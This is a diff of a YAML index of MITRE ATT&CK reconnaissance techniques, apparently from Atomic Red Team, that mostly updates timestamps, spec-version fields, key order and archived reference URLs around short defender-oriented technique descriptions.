@@ -111332,7 +112042,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -111348,8 +112058,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -111371,7 +112079,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -111387,8 +112095,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.001:
     technique:
@@ -111414,7 +112120,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -111432,8 +112138,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests:
     - name: Enumerate PlugNPlay Camera
@@ -111454,7 +112158,7 @@ reconnaissance:
           '
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -111510,7 +112214,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -111561,7 +112265,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -111582,7 +112285,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -111598,8 +112301,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -111621,7 +112322,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -111637,8 +112338,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -111660,7 +112359,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -111676,12 +112375,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -111721,8 +112418,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -111767,11 +112464,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -111811,9 +112507,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -111875,7 +112570,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -111901,7 +112595,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -111922,8 +112616,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -111988,7 +112680,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -112036,7 +112727,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -112058,7 +112748,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -112074,34 +112764,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -112110,15 +112776,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -112140,7 +112829,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -112156,8 +112845,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -112218,29 +112905,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -112249,15 +112917,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -112283,7 +112970,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -112301,47 +112988,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -112350,19 +113000,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -112385,7 +113071,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -112401,8 +113087,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -112428,7 +113112,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -112444,8 +113128,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -112473,7 +113155,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -112489,12 +113171,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -112503,16 +113183,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -112525,8 +113205,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -112537,52 +113217,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
